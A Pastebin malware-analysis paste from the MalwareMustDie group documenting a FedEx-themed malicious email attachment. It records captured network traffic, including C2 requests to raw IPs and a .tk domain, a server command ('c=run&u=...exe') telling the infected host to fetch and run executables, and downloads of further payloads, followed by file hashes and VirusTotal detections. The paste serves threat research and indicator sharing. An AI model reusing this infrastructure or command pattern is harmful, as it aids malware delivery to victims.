API tools faq
paste
Advertisement
MalwareMustDie

#MMD FedEX(mail attachment - Label_Fedex_Print_document.zip)

MalwareMustDie
Oct 20th, 2012
1,620
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 7.73 KB | None | 0 0
raw download clone embed print report
  1. DNS:
  2. 108.236.160.217.in-addr.arpa: type PTR, class IN, s15383432.domainepardefaut.fr
  3. sryfa.jvuydaas.tk: type A, class IN, addr 85.17.58.87
  4.  
  5. GET /2c21509821B51FE8A635B27547A4C6EE32F1AFC945611FBC3C2432BDDB871111DBC6B42D3E54F31FC40EC842203F406DC2DF061FFAD958364B3386EAD222A5E122F71DA508A105B2FF32 HTTP/1.0
  6. User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
  7. Host: 217.160.236.108:84
  8.  
  9. HTTP/1.1 200 OK
  10. Server: nginx/1.2.3
  11. Date: Tue, 16 Oct 2012 19:17:59 GMT
  12. Content-Type: text/html
  13. Content-Length: 49
  14. Connection: close
  15. X-Powered-By: PHP/5.4.4-7
  16. Vary: Accept-Encoding
  17.  
  18. c=run&u=/get/faa91cf5e79a76602f094ed38fad5872.exe
  19.  
  20. GET //get/faa91cf5e79a76602f094ed38fad5872.exe HTTP/1.0
  21. Accept: */*
  22. Proxy-Connection: Keep-Alive
  23. User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
  24. Host: 217.160.236.108:84
  25.  
  26. HTTP/1.1 200 OK
  27. Server: nginx/1.2.3
  28. Date: Tue, 16 Oct 2012 19:17:59 GMT
  29. Content-Type: application/x-msdos-program
  30. Content-Length: 468480
  31. Connection: close
  32. Last-Modified: Tue, 16 Oct 2012 19:00:04 GMT
  33. ETag: "ddc101-72600-4cc31c3021500"
  34. Accept-Ranges: bytes
  35.  
  36. MZ......................@...............................................!..L.!This program cannot be run in DOS mode.
  37.  
  38. GET /api/urls/?ts=b261bdc2&affid=70300 HTTP/1.1
  39. User-Agent: Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 5.1; Trident/5.0);(b:2600;c:INT-5560;l:07)
  40. Host: 175.41.28.156
  41. Connection: Keep-Alive
  42. Cache-Control: no-cache
  43. Pragma: no-cache
  44.  
  45. HTTP/1.1 200 OK
  46. Server: nginx/0.8.55
  47. Date: Tue, 16 Oct 2012 19:19:41 GMT
  48. Content-Type: text/html; charset=utf-8
  49. Transfer-Encoding: chunked
  50. Connection: keep-alive
  51.  
  52. http://sryfa.jvuydaas.tk/update.1.0.exe?ts=b261bdc2&affid=70300
  53.  
  54. GET /update.1.0.exe?ts=b261bdc2&affid=7030 HTTP/1.1
  55. User-Agent: Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 5.1; Trident/5.0);(b:2600;c:INT-5560;l:07)
  56. Host: sryfa.jvuydaas.tk
  57. Connection: Keep-Alive
  58. Cache-Control: no-cache
  59. Pragma: no-cache
  60.  
  61. HTTP/1.1 200 OK
  62. Date: Tue, 16 Oct 2012 17:16:41 GMT
  63. Server: Apache/2.2.3 (CentOS)
  64. Last-Modified: Mon, 15 Oct 2012 07:07:10 GMT
  65. ETag: "13c810e-32000-afa34380"
  66. Accept-Ranges: bytes
  67. Content-Length: 204800
  68. Connection: close
  69. Content-Type: application/octet-stream
  70.  
  71. MZ......................@...............................................!..L.!This program cannot be run in DOS mode.
  72.  
  73. GET /api/stats/install/?ts=b261bdc2&affid=70300&ver=3070010&group=srs HTTP/1.1
  74. User-Agent: Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 5.1; Trident/5.0);(b:2600;c:INT-5560;l:07)
  75. Host: 175.41.28.156
  76. Connection: Keep-Alive
  77. Cache-Control: no-cache
  78. Pragma: no-cache
  79.  
  80. HTTP/1.1 200 OK
  81. Server: nginx/0.8.55
  82. Date: Tue, 16 Oct 2012 19:21:44 GMT
  83. Content-Type: text/html; charset=utf-8
  84. Connection: keep-alive
  85. Content-Length: 0
  86.  
  87. $ md5sum.exe 1.bin Label_Fedex_Print_document.exe 4D726CFC1DE95098002C4D7240DAA130/4D726CFC1DE95098002C4D7240DAA130.exe
  88. 2c487ba4f99e1a712214977fd1b1529b *1.bin
  89. 57d9b0652f253933df251624b3965c52 *Label_Fedex_Print_document.exe
  90. 837725339650aac6625fa4a05e0e96e1 *4D726CFC1DE95098002C4D7240DAA130/4D726CFC1DE95098002C4D7240DAA130.exe
  91.  
  92. $ ls -l 1.bin Label_Fedex_Print_document.exe 4D726CFC1DE95098002C4D7240DAA130/4D726CFC1DE95098002C4D7240DAA130.exe
  93. ----------+ 1 Tom None 204800 Oct 16 22:23 1.bin
  94. ----------+ 1 Tom None 468480 Oct 16 21:19 4D726CFC1DE95098002C4D7240DAA130/4D726CFC1DE95098002C4D7240DAA130.exe
  95. ----------+ 1 Tom None 53760 Oct 16 00:53 Label_Fedex_Print_document.exe
  96.  
  97.  
  98. https://www.virustotal.com/file/0ae0dae36605e4dd0f0c841436f9517706b5b95c850e0cf2b0af6eaf05f311eb/analysis/
  99.  
  100. SHA256: 0ae0dae36605e4dd0f0c841436f9517706b5b95c850e0cf2b0af6eaf05f311eb
  101. SHA1: 8ed84aca99321ca2257822bfd8814b87e89aaa27
  102. MD5: 57d9b0652f253933df251624b3965c52
  103. File size: 52.5 KB ( 53760 bytes )
  104. File name: 1350392715.Label_Fedex_Print_document.exe
  105. File type: Win32 EXE
  106. Tags: peexe bobsoft
  107. Detection ratio: 10 / 43
  108. Analysis date: 2012-10-16 13:03:27 UTC ( 7 hours, 30 minutes ago )
  109.  
  110. Avast Win32:Trojan-gen 20121016
  111. ESET-NOD32 a variant of Win32/Injector.XTQ 20121016
  112. Ikarus Trojan.Win32.FakeAV 20121016
  113. Kaspersky HEUR:Trojan.Win32.Generic 20121016
  114. Kingsoft Win32.Troj.Undef.(kcloud) 20121008
  115. Norman W32/Kryptik.BVX 20121016
  116. Sophos Troj/Agent-YGO 20121016
  117. Symantec Trojan.Fakeavlock 20121016
  118. TrendMicro BKDR_ANDROM.AR 20121016
  119. TrendMicro-HouseCall BKDR_ANDROM.AR 20121016
  120.  
  121. https://www.virustotal.com/file/0ae0dae36605e4dd0f0c841436f9517706b5b95c850e0cf2b0af6eaf05f311eb/analysis/1350419657/
  122.  
  123. SHA256: 0ae0dae36605e4dd0f0c841436f9517706b5b95c850e0cf2b0af6eaf05f311eb
  124. SHA1: 8ed84aca99321ca2257822bfd8814b87e89aaa27
  125. MD5: 57d9b0652f253933df251624b3965c52
  126. File size: 52.5 KB ( 53760 bytes )
  127. File name: Label_Fedex_Print_document.exe
  128. File type: Win32 EXE
  129. Detection ratio: 19 / 43
  130. Analysis date: 2012-10-16 20:34:17 UTC ( 0 minutes ago )
  131.  
  132. AntiVir TR/Oficla.llooima 20121016
  133. Avast Win32:Trojan-gen 20121016
  134. Commtouch W32/Trojan3.EDK 20121016
  135. ESET-NOD32 a variant of Win32/Injector.XTQ 20121016
  136. F-Prot W32/Trojan3.EDK 20121016
  137. Fortinet W32/Agent.YGO!tr 20121016
  138. Ikarus Trojan.Win32.FakeAV 20121016
  139. Kaspersky HEUR:Trojan.Win32.Generic 20121016
  140. Kingsoft Win32.Troj.Undef.(kcloud) 20121008
  141. McAfee Generic.tfr!cp 20121016
  142. Microsoft TrojanDownloader:Win32/Kuluoz.B 20121016
  143. MicroWorld-eScan Gen:Variant.Symmi.3147 20121016
  144. Norman W32/Kryptik.BVX 20121016
  145. Panda Suspicious file 20121016
  146. PCTools Trojan.Fakeavlock 20121016
  147. Sophos Troj/Agent-YGO 20121016
  148. Symantec Trojan.Fakeavlock 20121016
  149. TrendMicro BKDR_ANDROM.AR 20121016
  150. TrendMicro-HouseCall BKDR_ANDROM.AR 20121016
  151.  
  152.  
  153. https://www.virustotal.com/file/a7d9c7b32411a3bbf1c757562b58f02387f1cfaeb0737d1c1fad7f3acfe410c5/analysis/
  154.  
  155. SHA256: a7d9c7b32411a3bbf1c757562b58f02387f1cfaeb0737d1c1fad7f3acfe410c5
  156. SHA1: cdc423285c40b9dcb752bbf23e96afd5a93a26ee
  157. MD5: 2c487ba4f99e1a712214977fd1b1529b
  158. File size: 200.0 KB ( 204800 bytes )
  159. File name: update.1.0.exe
  160. File type: Win32 EXE
  161. Tags: peexe
  162. Detection ratio: 3 / 43
  163. Analysis date: 2012-10-16 20:35:27 UTC ( 2 minutes ago )
  164.  
  165. Fortinet W32/Krypt.ABK!tr 20121016
  166. Kaspersky Backdoor.Win32.Papras.fts 20121016
  167. TrendMicro-HouseCall TROJ_GEN.RC1H1JG 20121016
  168.  
  169. https://www.virustotal.com/file/a7d9c7b32411a3bbf1c757562b58f02387f1cfaeb0737d1c1fad7f3acfe410c5/analysis/1350419889/
  170.  
  171. SHA256: a7d9c7b32411a3bbf1c757562b58f02387f1cfaeb0737d1c1fad7f3acfe410c5
  172. SHA1: cdc423285c40b9dcb752bbf23e96afd5a93a26ee
  173. MD5: 2c487ba4f99e1a712214977fd1b1529b
  174. File size: 200.0 KB ( 204800 bytes )
  175. File name: 1.bin
  176. File type: Win32 EXE
  177. Detection ratio: 3 / 43
  178. Analysis date: 2012-10-16 20:38:09 UTC ( 0 minutes ago )
  179.  
  180. Fortinet W32/Krypt.ABK!tr 20121016
  181. Kaspersky Backdoor.Win32.Papras.fts 20121016
  182. TrendMicro-HouseCall TROJ_GEN.RC1H1JG 20121016
  183.  
  184. First seen by VirusTotal
  185. 2012-10-16 15:28:54 UTC ( 5 hours, 13 minutes ago )
  186.  
  187. Last seen by VirusTotal
  188. 2012-10-16 20:39:33 UTC ( 2 minutes ago )
  189.  
  190. File names (max. 25)
  191. 1.bin
  192. update.1.0.exe
  193. DRWEB32.EXE
  194. DRWEB
  195.  
  196.  
  197. https://www.virustotal.com/file/63f914ce3072b60b296e9d9b4ea65a736098529e42abcd6cca1b3899fab861a6/analysis/1350419889/
  198.  
  199. SHA256: 63f914ce3072b60b296e9d9b4ea65a736098529e42abcd6cca1b3899fab861a6
  200. SHA1: 731d256bffe4280a6c13e66b85454d01134d75ee
  201. MD5: 837725339650aac6625fa4a05e0e96e1
  202. File size: 457.5 KB ( 468480 bytes )
  203. File name: 4D726CFC1DE95098002C4D7240DAA130.exe
  204. File type: Win32 EXE
  205. Detection ratio: 7 / 43
  206. Analysis date: 2012-10-16 20:38:09 UTC ( 0 minutes ago )
  207.  
  208. DrWeb Trojan.Fakealert.34171 20121016
  209. ESET-NOD32 Win32/Adware.SystemSecurity.AL 20121016
  210. Fortinet W32/FakeAV.NTP!tr 20121016
  211. Kaspersky UDS:DangerousObject.Multi.Generic 20121016
  212. McAfee FakeAlert-SecurityTool.fo 20121016
  213. MicroWorld-eScan Gen:Variant.Strictor.8753 20121016
  214. Norman W32/FakeAV.BJTK 20121016
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!